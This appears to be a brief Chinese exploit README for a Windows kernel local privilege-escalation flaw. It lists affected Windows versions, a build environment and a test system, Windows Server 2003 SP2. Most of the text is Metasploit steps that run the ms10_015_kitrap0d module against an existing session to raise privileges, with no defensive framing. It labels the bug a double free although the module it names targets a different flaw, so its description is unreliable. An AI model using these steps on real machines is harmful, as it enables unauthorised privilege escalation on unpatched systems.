内核中的双重免费漏洞允许本地用户通过精心设计的应用程序获得特权。
| Product | CPU Architecture | Version | Update | Tested |
|---|---|---|---|---|
| Windows 2000 | SP4 | |||
| Windows Server 2003 | SP2 | ✔ | ||
| Windows Server 2008 | SP2 | |||
| Windows Server 2008 | X64/X86 | |||
| Windows Vista | ||||
| Windows Vista | SP1 | |||
| Windows Vista | SP2 | |||
| Windows Xp | ||||
| Windows Xp | SP3 |
编译环境
- nmake 2013
测试系统Windows Server 2003 SP2 x86
msf利用
测试系统Windows Server 2003 SP2 x86,执行以下代码
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 3
run
可以看到当前权限是最低的
然后执行命令提权
